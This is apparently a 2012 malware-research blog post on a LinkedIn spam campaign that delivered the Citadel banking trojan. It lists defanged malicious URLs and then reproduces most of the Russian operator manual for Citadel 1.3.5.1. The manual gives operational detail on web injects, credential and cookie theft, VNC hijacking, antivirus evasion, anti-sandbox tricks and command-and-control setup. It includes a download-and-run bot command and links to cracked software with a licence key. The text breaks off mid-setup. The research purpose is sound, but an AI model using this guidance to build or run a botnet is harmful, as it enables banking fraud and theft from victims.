Wednesday, 17 October 2012

Citadel 1.3.5.1 Rain Edition

I know i've says i will do some articles about real life 'underground' before starting again on malwares but i've received  (like many) a fake LinkedIn Spam who send you on Blackhole Exploit Kit and who deliver Citadel payload, with some guys in twitter, we investigated the case.

Fake mail from LinkedIn:

Report done by @MalwareMustDie: http://pastebin.com/raw.php?i=z7n6SVxf
By Kim: http://stopmalvertising.com/spam-scams/unsolicited-email-from-linkedin-invites-zeus-bot.html

hxxp://www.nikecup.net/MSmxYk/index.html -> http://jsunpack.jeek.org/dec/go?report=eb44a315b959acb4f6d2aa6930fb3b1a8aaf7f0d
hxxp://www.conquestidiomas.com.br/E6yNoKqE/index.html -> http://jsunpack.jeek.org/?report=817f275a5ecac6a62371be80e0f3fa036105ac19
--
hxxp://dualab.com/v3FXJcVQ/js.js - 217.76.132.170
hxxp://jbrnh.com/3ZKtSw8d/js.js - 184.168.101.248
hxxp://scarom.de/x3xi02wu/js.js - 176.223.123.143
--
hxxp://108.178.59.16/links/assure_numb_engineers.php - http://urlquery.net/report.php?id=234576
hxxp://11.blogbestsites.com/links/assure_numb_engineers.php (108.178.59.16)

Following a Kafeine post about the latest update of Citadel, i've gived a f*ck, trying to get the latest version.
Finally that will be done by hack with (too) many attempts on different servers and with lulz on some:


Want more malware fail ?
With leet stuff like 'KisS OF dEAth', 'htmlvirus' and Stuxnet, ph34r.

Well, let's see the latest advert:

Still with lame joke:

Overview of C&C package:

Some files

 Installation

Personal Manual (for translation, http://translate.google.com/?hl=en&sl=ru&tl=en):
Version 1.3.5.1 Rain Edition
Manual Version: 3.0 (Последнее обновление 03.10.2012)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Cодержание:
1. Нововедения
2. Доступ в CRM и ее описание
3. Step-By-Step установка Citadel
а) Требования к серверу.
б) Шаг 1 [Билдер, права, скрипты]
в) Шаг 2 [Дополнительная защита админки]
г) Шаг 3 [Разбор конфига]
4. Установка BackConnect Windows сервера (VNC модуль)
5. Установка Citadel VNC Admin Interface
6. Установка модуля чекинга веб-соксов (WebSocks)
7. Установка модуля парсера логов (WebParser)
8. Установка модуля CardSwipe
9. Работа с крипт-панелью (Crypt Exe)
10. Установка системы проксирования (прокладка)
11. Краткий мануал по новым фичам админки
12. Работа с API (api.php)
13. Как обновлять админку и бота на следущие версии Citadel
14. Описание опций в конфиге билдера
15. FTP-ифреймер. Характеристика и настройка
16. Описания модуля "Кейлоггер процессов"
17. Модульная GeoIP защита ботнета
18. Модуль "Дубль-клинер логов"
19. Модуль веб-инжектов (WebInjects)
20. Общая рекомендация и частые вопросы
21. Как правильно задавать вопросы в Jabber
22. Лицензионное соглашение и правила использования
23. Список команд для бота
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

********************************************************************************
==========================>>>>> 1. Список возможностей и нововведений Citadel:
********************************************************************************
[+] Фикс VNC бага на Vista/Windows 7. Теперь можно полноценно работать с Internet Explorer 8 (напомню, была проблема с рендерингом IE)
[+] Поддержка Mozilla Firefox 7.0 (решена проблема, при которой не слались отчеты в последних версиях браузера)
[+] Крипто-защита (расшифровывающая тело в памяти).
[+] Редиректы DNS (не через hosts). Можно блокировать/редиректить любые URL'ы, не опасаясь, что их заметит эвристика. Например заблокировать AV-cервера или редиректить банк-пагу на другой хост.
!BONUS! Список URL'ов популярных антивирусных программ для блокирования идет в комплекте.
[+] Информация о версии сотфа в репорте. Высылает вам подробную версию браузера холдера вместе с отчетом. Помогает, при имитации настроек холдера.
[+] Дополнительный уровень защиты сервера от трекеров - Login Key.
[+] Механизм аутинтефикации при загрузке конфигов (нет прямых урлов). Дает полноценную защиту от устоявшихся трекеров.
[+] Поддержка граббера Google Chrome. [Проверено на последней версии 15.x/16.x/17.x].
[+] Поддержка инжектов Google Chrome. [Проверено на последней версии 15.x/16.x/17.x].
[+} Добавлено кеширование поиска функций, что ускоряет установку хуков Chrome.
[+] Добавлена возможность выполнения системных CMD команд при старте бота (секция CMDList) с отправкой репорта на сервер. К примеру, нужно вам чтобы при инсталле, отправлялся результат команды "ipconfig /all", или список всех доступных шар. Полезно, при анализе внутренней структуры компаний. (например, часто попадаются боты в локалке с именами ACCOUNTANT_PC, POS_SERV, DATABASE...)
[+] Добавлен механизм проверки сохранности хуков на некоторых Windows.
[+] Эвристический анализатор окружения со стоп листом для нежелательного ПО (значительно повышает скрытность),включены все популярные антивирусы.
[+] Исправлены мелкие баги.
[+] Видео граббер. Уникальная возможность следить за работой ваших инжектов "глазами холдерами", в конфиге указываются список сайтов и длина записи видео в секундах, при заходе на заданный линк, активируется видео-запись в формате .mkv. Рекомендуется настроить свой сервер для приема файлов 10-60МБ.
[+] Убрано удаление кукисов при инсталле, т.к это сбивает "fingerprint" холдера при работе с заливами.
[+] добавлена поддержка HTTP 1.0 и расширенных хидеров (например респонз не всегда выглядит как "HTTP/1.1 200 OK", бывает "HTTP/1.1 200 follow document", в данном случае после кода 200 идет несколько слов) применимо к браузерам Firexfox & Chrome
[+] Добавлен гейт генератор (на случай, если вы хотите разместить файлы на промежуточном хосте для редиректа).
[+] Полностью переделано шифрование (передача данных, запись логов/видео, загрузка конфигов и т.д) у Citadel, на смену устаревшему RC4 используемому в Zeus, пришел AES 128. Напомню, что RC4 дал асечку, когда массово начали выпускаться различные декрипторы конфигов/инжектов для Zeus, а хосты начали палиться в abuse.ch.
Теперь помимо встроенного RC4, который шифруется с вашей персональной сигнатурой, в софт также встроено AES шифрование, на выходе мы получаем защищеное AES128 обращение бот<->гейт. Никакие ZeusDecryptor'ы(ThreatExpert) и автоматизированый реверсинг не будут помехой для вашей комфортной работы на текущий момент (Jan 2012).
[+] Весь базовый функционал, оставшийся от зевса присутствует. Думаю, не стоит его писать здесь снова.
[+] Исправлена ошибка записи репортов у веб-фильтров в конфиге с параметром "!" (игнорирование), который должен был исключать все заданные ссылки, а вместо этого делал обратное и писал их в лог.
[+] Добавлен новый параметр-фильтр в config-файл, а именно функция отсылать или не отсылать cookies на сервер.
Параметр статичного конфига disable_cookies 0/1 указывает отключить ли граббинг куков (1 - отключить, 0 - включить).
Вручную, также, кукисы можно получить командой user_cookies_get из админки, если очень нужны.
[+] Добавлена функция произвольного открытия страницы дефлотовым браузером пользователя на боте.
К примеру, если вам нужно накрутить какой-нибудь счетчик или статистику голосования или вы хотите получать доп.доход с вашего ботнета открывая страницы с шопами (а также: фарма, гемблинг, дроп-проекты и т.д..) отличный способ разрекламировать нужную страницу!
Новый параметр url_open <url>
[+] Новый вид фильтрации WebFilters в конфиг-файле при сборке.
Два новых параметра: P и G.
Параметр P указанным перед ссылкой, указывает о записи только POST запросов(все другие игнорируются) с этой ссылки.
Параметр G указывает о записи только GET запросов (все другие игнорируются) с заданной ссылки.
Параметры не комбинируются, т.е. следует указывать какой-то один из них.
[+] Добавлена модульная система в софт, что дает нам:
* Расширяемость и загрузку любого операционного функционала ботам, ориентированного для Citadel.
Все модули загружаются с сервера и распаковываются динамически в памяти, что исключает их детектирование.
Хранение и передача во внешнем мире исключительно в шифрованном виде.
Модули грузятся в целевые процесссы, поэтому весомо экономят память.
Большая управляемость - модули можно отключать через конфиг.
[+] Видео-граббер переделан на модульную основу. Теперь вес некриптованного билда <190 кб. Всегда.
[+] Добавлен новый параметр timer_modules (тайминги для загрузки модулей).
[+] Добавлена поддержка нового браузера Google Chrome 17, а также исправлен баг с обработкой Flash'a в нем.
[+] Добавлена поддержка макросов. Введены макросы: %BOTID%, %BOTNET%
* Можете вставлять в любой участок инжектов данные макросы и передавать данные на ваш сервер (АЗ/инжекты), передается имя бота и имя ботнета.
[+] Добавлены 4 команды управления модулями (включение/выключение, запрет/разрешение на скачивание).
[+] Добавлен новый параметр disable_httpgrabber 1/0 для Chrome: исключает обработку обычных HTTP (не HTTPS) запросов.
[+] Добавлена запись полного User-Agent в отчеты HTTP(S) граббера, позволяет клонировать холдерский UserAgent через любые утилиты типа CCTools.
[+] Добавлена запись разрешения экрана в отчеты HTTP(S) граббера, пример "Screen(w:h): 1600:900" - полезно при клонировании параметров холдера, многие банки на это обращают внимание.
[+] Изменен протокол отправки видео-файлов для снижения нагрузки на сервер (у некоторых были проблемы с нагрузкой на сервер и он сильно тормозил)
[+] Добавлена возможность отсылки jabber-уведомлений нескольким получателям в админке Citadel.
[+] Добавлена возможность указания нескольких url_config'ов (пути до основного конфига), раньше было так: если у вас недоступен основной конфиг в момент инсталла бота, то резервный никак не скачивался, теперь этой проблемы не будет и бот пытается стянуть конфиг с другого URL'a(можно вписать до 3 резервных).
[+] Исправлена ошибка в Google Chrome (17x) приводящая к зависанию подпроцесса, при открытии нескольких вкладок с инжектами.
[+] Добавлены новые команды:
- Получение информации об установленном ПО (список - компания|продукт|версия) на компьютере: info_get_firewall
- Получение информации об установленном антивирусе на компьютере: info_get_antivirus
- Получение информации об установленном фаерволе на компьютере: info_get_firewall
Информация идет в виде отдельного репорта для каждого бота. Скоро встроим массовую статистику по установленному софту в админку Citadel.
[+] Изменен алгоритм антиэмуляции для ряда АВ (не считается криптором, софт стал невидимым для нескольких проактивок).
[+] Исправлена проблема запуска под пользователем SYSTEM.
[+] Добавлена возможность особых Jabber-уведомлений, при обнаружении заданных ботов по маске (к примеру маска *corporate*, будет искать botid с таким совпадением), даже если они не прислали никаких логов, скрипт уведомит вас в Jabber-сообщении о появлении бота. Теперь вы не пропустите мимо глаз ценных ботов.
[+] В админке появилась новая секция "Эффективность и Безопасность", мы провели интеграцию с сервисом scan4you, и теперь вы можете одним кликом проверить все ваши ехе-билды на палевность сразу в админке Citadel, также, вы можете установить автоматическую проверку файлов раз в сутки, и если один из ваших файлов палится более чем 3я антивирусами, вы немедленно получите уведомление в ваш Jabber, чтобы вы могли
сразу заменить ехе. Теперь механизм будет работать за вас автоматически, ленитесь на здоровье!
[+] Некоторые клиенты жаловались на то, что лишь 40% ботов обновляется на новую версию ехе, остальные не могут обновиться по какой-то неизвестной причине. Действительно, баг остался еще со времен зевса, мы его исследовали и исправили. Теперь введен новый параметр в конфиге: timer_autoupdate 8
В котором задается время (в часах), как часто скачивать и перезапускать exe с сервера (RC4 ключ должен совпадать). 80% ботов теперь обновляются успешно, криптуйте и перезаливайте ехе, живучесть повысилась на 37.1%, ваши боты будут иметь самый свежий и чистый билд.
[+] Переработана система отправки отчетов на сервер, в предыдущих версиях для каждого отчета происходила единичная отправка POST запроса на гейт, в новой схеме отчеты отправляются пачкой по несколько штук, это позволяет свести до минимума количество сессий на сервере и нагрузка на сервере становится минимальной, что позволяет выдерживать большое количество ботов онлайн.
[+] Формат видео от ботов изменен на .webm(HTML5), мы встроили онлайн видео плеер в админку Citadel, теперь вы можете смотреть видео прямо в вашем брауезере(рекомендуется Opera). Из возможностей: перемотка назад-вперед/фулл-скрин/поиск видео по BotID,IP-адресу,дате.
Но этого мало и мы пошли дальше, многие из вас используют(пора уже всем использовать и разрабатывать индустрию совместно) АЗ и персональные админки для инжектов/сбора акков и т.п. Вы бы хотели из вашей админки смотреть видео по заливу или как работает ваш инжект на боте? Легко! Мы создали API-систему, теперь вы можете передать BotID или IP-адрес скрипту, а API вернет вам готовый HTML-embed код всех видео по данному боту и вы можете вставить и смотреть видео хоть на narod.ru, не заходя в админку Citadel.
[+] Добавлен удобный анализатор-парсер системных команд (CMDList) в админку, теперь вы можете посмотреть в новом формате в виде таблицы, результаты выполнения системных команд, таких как: ipconfig, список ПК в локальной сети, список процессов и т.п.
[+] Теперь при установке билда на бота, автоматически единоразово присылается в админку cледущая информация: установленные фаерволлы, установленные антивирусы, установленные программы.
Вы можете посмотреть информацию как для отдельного бота, так и для всего ботнета. Мы создали отдельный раздел, в котором вы можете посмотреть всю статистику в виде наглядного графика и подсчетов. Теперь вы знаете с кем бороться.
[+] Добавлена возможность "Избранных логов", вы можете пометить любой интересный аккаунт(отчет) при поиске данных в админке, а потом без труда найти его т.к он будет выделен отдельным цветом.
[+] Реализована совместимость инжектов с UTF-8 (теперь в инжекты можно вставлять любые языки, такие как японский, китайский и т.д)
[+] Разработана крипт-панель в админке Citadel. Это раздел в админке, который позволяет вам обновлять ехе-файл ботам, прямо из веба. В любой момент, вы можете перезакачать нужный ехе-файл и боты его своевременно скачают. Ведется история загрузок в формате: Файл | Дата Загрузки | Оплачено(Y/N)
По поводу последнего пункта, мы разделили полномочия и создали отдельную категорию пользователей с правами "криптера" - эти пользователи имеют доступ к вашей панели по вашему желанию и единственная привилегия этих пользователей - возможность обновлять ехе-файл, при этом вы можете отмечать в таблице, оплачен конкретный крипт или нет.
Можно включить jabber-уведомления по результату проверки на scan4you.
[+] Добавленны полноэкранные скриншоты (Опция в конфиге - "@@").
[+] Улучшен механизм автоапдейтинга: если вы столкнулись с проблемой большой нагрузки на сервере при обновлении(либо боты не переходят на новую админку), то этот фикс исправляет эту ситуацию. Фикс включает в себя:
- Старые репорты от прошлой версии ехе удаляются при обновлении (tmp файл), дополнительная подстраховка.
- Тяжелые отчеты (видео и прочее файловые репорты) дополнительно проверяются на корректность и удаляются в случае проблем(например, если такой файл уже закачан)
- Изменено время инициализации апдейтинга, в результате чего исклчючен deadloc и не возможность дальнейшего апдейта при какой-либо ошибке файловой системы.
[+] Исправили проблему мусорных логов в админке: убрали полное логирование Flash-роликов (swf/flv) из логов и всего Facebook, потому что огромное количество мусора идет именно от них.
[+] Модуль "Качественная проверка WebSocks" теперь встроен в админку, никаких лишних скриптов. Показывает: страну, штат, город, хостнейм, аптайм и ping lag.
Возможность входа в этот раздел без пароля, для удобства когда нужен срочно сокс smile.gif
[+] Модуль "Парсер логов" теперь встроен в админку, никаких лишних скриптов. Интерфейс значительно улучшен, добавлена возможность создания "избранных доменов", "архивных логов" и возможность парсинга https или http доменов на выбор. Выстраивается визуальная таблица всех доменов, которые фигурируют в логах.
[+] Добавлен раздел "Заметки" в админку Citadel, что-то вроде онлайн блокнота. Адаптировали интерфейс админки для планшетов iPad/Galaxy Tab.
[+] Доработали модуль "VNC-админка", теперь он встроен напрямую в админку Citadel, никаких дополнительных скриптов. Все устанавливается 1 кликом. Много новых возможностей, а именно:
- Возможность работы с API, вы передаете BotID или IP-адрес скрипту, к примеру через инжект, а он устанавливает VNC/BackConnect Socks-соединение, присылая данные для подключения вам в Jabber. Можно вызывать скрипт в любой момент времени, применимо к АЗ.
- Напротив каждого отчета в разделе "Поиск в базе данных" появилось 4 кнопки: "Добавить в избранное", "Connect VNC", "Connect BC Socks", "Autoconnect VNC", "Autoconnect BC SOCKS"
- AutoConnect VNC при включенной опции, бот будет устанавливать vnc-соединение при каждом выходе в онлайн, пока вы не отключите это.
- AutoConnect BC Socks при включенной опции, бот будет устанавливать backconnect socks соединение при каждом выходе в онлайн, остальные опции создают разовый коннект.
- Появилась возможность создавать автоматически VNC/BC SOCKS-соединение как только от бота пришел нужный аккаунт по URL-маске, разбираем горячие пирожки.
- Напротив каждого аккаунта по URL-маске пишется дата последнего входа в этот акк (last login), теперь вам не надо чекать аккаунты на активность - за вас это сделают скрипты.
- Возможность любых уведомлений в несколько Jabber'ов сразу.
[+] Исправлена проблема цепочки хуков в Chrome.
[+] При запуске user_execute с флагом "-f" принудительно переводится в режим только апдейтинга ехе и не будет запущен как инсталятор.
[+] Оптимизирована работа гейта, что позволило снизить нагрузку. Упрощена работа инсталлятора админки, что позволяет установить все модули в 1 клик.
[+] Добавлена поддержка новой версии Chrome 18 [инжекты/формграббинг]
[+] Добавлена кнопка "Все отчеты бота" в админке, позволяет просмотреть начало и конец отчетов от конкретного бота.
[+] Исправлен баг с ручной командой dns_filter_add, теперь блокировка URL'ов работает корректно.
[+] Исправлен баг с отображением ехе-файлов на главной странице, удаленные ехе теперь исчезают автоматически.
[+] Исправлен баг с работой планировщика заданий scan4you, ежедневная проверка ехе-файлов работает корректно.
[+] Добавлена единая система CRON-работы, одно cron-задание управляет теперь всеми задачами: jabber-уведомления, проверка файлов, работа модулей и т.п.
[+] Добавлена возможность удаления видео из админки.
[+] Добавлена отсылка примечания к боту в Jabber в VNC-модуле.
[+] Обновлена GeoIP база (конец 2011 года).
[+] Последний домен из AdvancedConfigs срабатывает с задержкой, сделано с целью защиты ваших резервных URL'ов от автоматического граббинга ханипотами.
[+] Исправлена работа скрипта архивирования данных в zip в админке (fsarc.php)
[+] Настройки Jabber-аккаунта и всех параметров теперь вынесены в общие настройки.
[+] Теперь можно указывать пути в конфиге с httpS:// (неподписанные сертификаты проходят)
[+] Исправлен баг с регистрозависимостью в инжектах, теперь <BODY> и <body> одинаковые сущности. Все инжекты регистронезависимые.
[+] Полностью измененый интерфейс веб-админки, user-friendly.
[+] Добавлен онлайн просмотр скриншотов из админки. Скрины выстраиваются в ряд в порядке появления, легко переключаются клавишами вперед-назад, сортируются. Нет смысла больше скачивать картинки и смотреть по одной. Виртуальные клавиатуры/страницы видно последовательно.
[+] Добавлена история отстука, вы можете посмотреть статистику отстука вашего ботнета(активных,всего,процент) за неделю, две недели или месяц.
[+] Добавлена история версий софта, вы можете посмотреть статистику по обновлениям Citadel в вашем ботнете. Будете знать сколько ботов перешло на новую версию, а сколько осталось на старой. Рисуется диаграмма.
[+] Возможность поиска логов, только по ботам, которые находятся в онлайне.
[+] Возможность поиска логов по нескольким кейвордам сразу, а также можн их сохранить как алиас и не вводить при следущем поиске заново, а просто выбрать из списка.
[+] Добавлена кнопка "Cookies" в контекстное меню по ботам, которая позволяет оперативно вывести все Cookies бота, если вы их не отключали. Экономит время.
[+] Интегрирована функция экспорта FTP-аккаунтов в API, полезно, если используете сторонний софт класса FTP-Iframer, позволяет вывести в plain-text/xml/php формате ftp-акки по нужной дате.
[+] Добавлена кнопка "Whois" в просмотре отчета, позволяет одним кликом получить всю информацию по IP-адресу отчета.
[+] Добавлена функция комментария к боту при просмотре отчета, а также времени, когда бот последний раз был онлайн.
[+] Создан новый раздел "Избранные отчеты", который позволяет сохранить быструю ссылку на нужный вам отчет + комментарий к ниму. К примеру, если вы встретили интересный аккаунт, нажимаете "добавить в избранное" и отчет будет виден в отдельном разделе, с автоматическим Whois'ом данных и вашим комментарием. Сохраняйте акки не отходя от кассы.
[+] Добавлен антиэмулятор, который позволяет защитить ваш ботнет от реверсинга и попадания в трекеры. Если при запуске, билд детектит что он был запущен в виртуальной машине или песочнице CWSandbox, VMware, Virtualbox, Sandbox он начинает вести себя по-другому и ваш ботнет останется незамеченным. Подробности не раскрываются, т.к анонс находится в паблике и технология очень хитрая.
Из минусов: не сможете протестировать работу в Vmware, придется делать это на реальном ПК или дедике. Опция вынесена в конфиг. antiemulation_enable 0/1
[+] Добавлено отображение статуса бота "Online/Offline" при просмотре отчета.
[+] Одна из самых главных фич: предпросмотр отчета при поиске логов. Не нужно больше открывать 200 окон в браузере, чтобы просмотреть каждый отчет и каждую ссылку. Теперь можно легко нажав на один отчет сделать предпросмотр, а если отчет будет интересен, то просмотреть полную версию.
Поддерживается быстрое переключение между отчетами клавишами назад-вперед-ESC.
[+] Обновлён скрипт cronjob очистки старых скриптов(команд). Теперь должен у всех работать без багов.
[+] Добавлена в контекстное меню опция "Скриншоты бота"
[+] Модуль VNC-админки: добавлена сортировка по дате последнего соединения / ОС (К примеру, если нужно только WinXP).
[+] Модуль парсер логов: добавлена сортировка по домену / количеству отчётов в порядке убывания.
[+] Модуль FTP-ифреймер: исправлен баг с "умным" ифреймингом, когда кавычки в iframe-коде экранировались. Текущим владельцам, рекомендуется перезалить скрипт-прокладку.
[+] Поскольку предыдущий алгоритм шифрования был взломан спустя несколько месяцев, из-за этого некоторые клиенты попадали в ZeusTracker. Мы разработали и внедрили новый алгоритм шифрования на основе модифицированного RC4. В шифровании используется особый ключ, известный только клиенту. что требует его наличия для расшифровки. Поскольку у каждого клиента свой индвидуальный ключ, теперь от одного клиента не будут страдать все остальные. Если попал один, другие будут от этого защищены. Сейчас мы полностью изолированы от автоматического анализа билдов. В итоге получаем 2 уровня авторизации-защиты бота от трекеров.
[+] Сделали подрезание опции X-Frame-Options в Header'ах, т.к она может мешать некоторым инжектам в работе.
[+] Проделана огромная работа для корректного формграббинга/инжектинга в Chrome 19 (19.0.1084.52m)
[+] Ускорена работа на больших ботнетах админ.интерфейса + гейта засчет оптимизации функционала GeoIP-базы.
[+] Сделана быстрая проверка ботов на Online-статус, списком на главной странцие.
[+] Возможность добавить бота в "Избранное" без отчетов.
[+] Сделано детектирование привилегий в системе(admin/user), отображается в "Информация о боте - Флаги"
[+] Сортировка скриншотов по дате.
[+] Добавлена возможность подключения других БД Citadel (как удаленные, так и старые/отключенные админки) для поиска отчетов.
[+] Расширен поиск в БД: можно указывать стоп-слова, например twitter.com, которые будут отсутствовать при выдаче результатов, чтобы не засорять логи мусором. Также, можно указать поиск не по содержимому отчета, а по URL Mask, это увеличивает скорость поиска данных.
[+] Расширен Jabber уведомитель, добавлены следущие события:
- Маски BotID на событие "Бот вышел в Online"
- Уведомление при обнаружении конкретного ПО из "installed software"
- Маска на содержимое CMD отчета.
- Параллельная удобная запись в log-файл всех событий, помимо Jabber-уведомлений.
[+] Добавлен бесплатный модуль граббинга кукисов в Firefox, экспортирует все cookies из браузера и отсылает вам.
[+] Исправлена ошибка удаления отчетов.
[+] Авто-обновление статистики главной страницы.
[+] Кнопка [Decode] на отчетах, которая позволяет декодировать urlencode(%0D) последовательности в удобный вид.
[+] Добавлена возможность определения online/offline статуса у бота в API.
[+] Полностью переделан алгоритм проверки в модуле WebSocks.
[+] Отображение скриптов(команд) постранично.
[+] Добавлена возможность отсылки сообщений на jabber через api.php (использует ваши персональные настройки в админке)
[+] Теперь при каждом HTTP/HTTPS отчете, добавляются cookies(Firefox/IE), а также заголовки:
[+] Полностью переделан внутренний алгоритм шифрования, отстук во много раз выше, живучесть дольше. Для переноса ботов на новую версию, выполняем команду user_execute http://www.host.com/1351.exe. RC4 ключ должен совпадать.
[+] Корректировка Browser Keylogger'a. Автоматически добавляются пробел, если с момента последнего нажатия клавиши прошло 5 секунд, необходимо для визуального разделения input-полей.
[+] Исправлен недочет с 302 редиректом, когда не срабатывал инжект, если осуществлялся переход по ссылке через javascript.
[+] Plaintext логи открываются в новой вкладке.
[+] Исправлена ошибка пропадания ботов из онлайна при включенном GeoIP.
[+] Отображение комментария к боту в VNC-модуле при наведении мышки, а также отсылка комментария в jabber вместе с информацией о коннекте.
[+] Возможность указать в DnsFilters маски со звездочками (*), сделать маску более гибкой.
[+] WebInjects. Модуль разработан для быстрого взаимодействия с холдером через технологию инжектов в браузеры. Модуль позволяет прогрузить любые инжекты конкретному BotID, стране или ботнету всего лишь за несколько минут, без редактирования конфига. Все работает через админку.
Краткий ликбез:
В конфиге бота, секция DynamicConfig, вписывается параметр url_webinjects "http://www.host.com/file.php" (путь до file.php). Бот дергает этот файл раз в 2 минуты, забирая оттуда пачку инжектов, которую выдает распределения система выдачи инжектов.
В разделе ВебИнжекты существуют 2 секции: "Группа вебинжектов" и "Паки", первая имеет структуру "Группа - Инжекты - Пользователи(допущенные к группе)" и отвечает за управление всеми инжектами. Вторая секция отвечает за настройку распространения инжектов(каким ботам доставляем инжекты и в каком количестве).
В главном меню, вразделе "Пользователи", при создании нового пользователя, есть права "r_botnet_webinjects_coder" это пользователь, который может управлять группой, привилегии которого назначит администратор. Иначе говоря, если вы допустите разработчика инжектов в админку и создадите ему аккаунт, то у него будут права создавать свои инжекты и редактировать их, чужие инжекты он не видит, отображается только своя группа списка инжектов. Т.е вы можете создать 5 групп и создать 5 инжект-кодеров, таким образом каждый человек отвечает за свою группу(набор инжектов). Вы смотрите в статистике что происходит в общей системе и можете объеденять все группы инжектов в один "пак", который будет прогружен всем без исключения ботам, либо отдельно взятой категории ботов по классу: страна или ботнет.
В админке создан специальный удобный визуальный редактор инжектов с подсветкой синтаксиса. Формат полностью совместим с зевсоформатом.
Сушествует несколько режимов для паков.
Dual - когда работает файл с инжектами из основного конфига + вебинжекты.
Single - когда работают только вебинжекты, а локальный файл с инжектами отключается.
Disabled - когда вебинжекты отключены, а локальный файл с инжектами работает.
Если случайно была допущена ошибка где-то в инжекте, то вебинжекты не соберутся и вам придет DEBUG-отчет с информацией, какой пак(bundle) не был собран.
В информации по боту, можно посмотреть историю прогрузки веб-инжектов, также, можно поискать DEBUG-отчеты по боту и посмотреть историю компиляций и ошибок вебинжектов.
Если бот получает сразу несколько паков(бандлов) где разные режимы работы: dual, single, disabled то из всех бандлов выбирается автоматически самый "узкий режим" работы, например single.
Бот постоянно сверяет наличие обновления любого из вебинжектов, и если таковое имеется, то он его обновляет у себя.
[+] Опция в конфиге disable_httpgrabber расширена и позволяет полностью избавиться от HTTP-отчетов, отправляя на сервер только HTTPS-отчеты со всех браузеров, если установлено значение "1". Избавьтесь от лишней нагрузки на сервер.
[+] Добавлена секция "HttpVipUrls" в WebFilters, которая позволяет добавлять ссылки-исключения(http://) при отсутствии HTTP-граббинга (disable_httpgrabber 1).
----------------------------------------------------------------------------
ДЛЯ УПРОЩЕНИЯ ПОНИМАНИЯ ИНФОРМАЦИИ, ВЫ МОЖЕТЕ ПРОПУСТИТЬ РАЗДЕЛЫ,
ГДЕ ОПИСАНА УСТАНОВКА И ИСПОЛЬЗОВАНИИ МОДУЛЕЙ, КОТОРЫЕ ВЫ НЕ ПРИОБРЕТАЛИ
ИСПОЛЬЗУЙТЕ CTRL+F ДЛЯ ПОИСКА КЛЮЧЕВЫХ СЛОВ И ОПРЕДЕЛЕНИЙ.
----------------------------------------------------------------------------
********************************************************************************
==========================>>>>> 2. Доступ в CRM и ее описание
********************************************************************************
Данные аккаунта выдаются персонально в Jabber.
Что такое Citadel CRM Store?
Это система взаимодействия между нашими клиентами и разработчиком.
Наверное, вам знакома ситуация, когда саппорт продукта игнорит ваши запросы в icq/jabber'e - этому способствует высокая нагруженность человека, который отвечает за все это, потому что клиентов много, а он один, да еще и занят делами.
Специально для вас была разработана система, благодаря которой, вы можете незамедлительно сообщить о баге в софте, а мы в свою очередь его пофиксим, если таковой имеется. Все запросы поступают нескольким людям одновременно, с уведомлениями по jabber/sms. Вы довольно быстро получите ответ внутри тикет-системы.
У вас возникла замечательная идея для доработки софта и вы хотите ею поделиться с разработчиком (пусть это даже самая маленькая идея: к примеру, вам не нравится формат логов) - мы идем вам навстречу.
Вы можете создать 2 вида заявок(читайте-проектов) внутри CRM:
а) публичная заявка - это заявка с темой + описанием(лучше прикладывать ТЗ), которую будут видеть все клиенты, они могут ее обсудить в комментариях, предложить свою цену за реализацию и голосовать: нужна ли эта заявка или отправляем ее в треш.
Вы можете создавать данные виды заявок, а можете голосовать и делать любые действия относительно других заявок клиентов.
б) приватная заявка - если вы хотите предложить нашим разработчикам индвидуальную задачу и хорошую цену за реализацию, то этот вид заявки для вас. Его может видеть только разработчики(т.е мы) и вы. Если все условия устраивают обе стороны, данный модуль получаете только вы.
Все актуальные заявки, вы можете видеть в разделе "На обсуждении"

Право голоса имеет 4 значения:
- Нужен, я приобретаю
- Полезен, но мне не нужен
- Абсолютно не нужен
- Не нужен, я не приобретаю
Если вы увидели новую заявку - проголосуйте за нее, даже если она вам вообще не нужна! У нас очень узкий круг, поэтому именно ВАШЕ мнение является решаюшим для ВСЕХ, не оставайтесь в стороне.
О любых событиях внутри CRM(решения, заявки, комментарии) вы будете уведомлены ботом по jabber-каналу. Это сделано для вашего удобства, чтобы вам не рефрешить каждый раз страницу. Но все равно, необходимо заходить в СРМ чтобы следить за новостиями и заявками и проявлять свое мнение.
Чем быстрее идут голоса и мнения - тем оперативнее развивается продукт.
Если заявка набирает много отказных голосов, она идет в раздел "Отклоненные заявки" и закрывается.
Если заявка одобряется разработчиками, она идет в раздел "В разработке" и мы оцениваем примерные сроки ее реализации.
Не забудьте указать желаемую объявленную цену на модуль, за которую вы бы оценили доработку.
Все новости мы публикуем в разделе "Новости", если вам не приходят уведомления в Jabber, пожалуйста, немедленно сообщите об этом в саппорт т.к вы лишаете себя очень многого!
Заходите в СРМ почаще и проверяйте новости и комментарии к заявкам.
2) Список полезных ссылок, которые помогут вам:
1) VMWare Workstation 6.5.0 + VMWare Tools + Crack:
http://www.citadelmovement.com/software/VMware-workstation-6.5.0-118166.exe
2) Образ англоязычной Windows XP SP3 (Corporate Edition):
http://www.citadelmovement.com/software/Microsoft_C2AE_Windows_XP_SP3_Corporate.iso
Key: MXDJT-W3TCG-2KGQH-YPMK3-F6CDG
3) Комплект разработчика для создания инжектов + примеры (автор неизвестен, взято с форумов):
http://www.citadelmovement.com/software/injects_development.zip


********************************************************************************
==========================>>>>> 3. Step-By-Step установка Citadel
********************************************************************************
Установка Citadel
Папки:
builder - комплект билдера
backconnect - софт для BackConnect VNC модуля, а именно php скрипты для Backconnect Windows сервера (об этом ниже).
webserver(Либо server[php]) - админка и комплект скриптов для закачивания на сервер.
webserver/cp.php - файл управления админкой
webserver/gate.php - основной гейт для общения с ботом
webserver/file.php - скрипт выдачи конфигов и ехе файлов боту.
********************
>>>>>>>>>> а) Требования к серверу.
********************
PHP >5.3, Mysql 5 (желательно последняя версия, но на 5.2 тоже работает) Обязательно с модулем curl для PHP
cron, apache. По желанию nginx и панель управления cPanel или DirectAdmin.
+ Windows VPS если приобретали VNC админку (о самом модуле чуть ниже), Windows2008/2003/7 + 512 оперативной памяти и 2 гб места на диске. Процессор не ниже 1024 mhz

********************
>>>>>>>>>> б) Шаг 1 [Билдер, права, скрипты]
********************
При запуске builder.exe, будет строчка
Ключ авторизации: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Это ваш индвидуальный ключ для защиты от трекеров (мы его называем еще LOGIN KEY)
Его нужно поместить в файл webserver/system/global.php, в котором содержится строчка
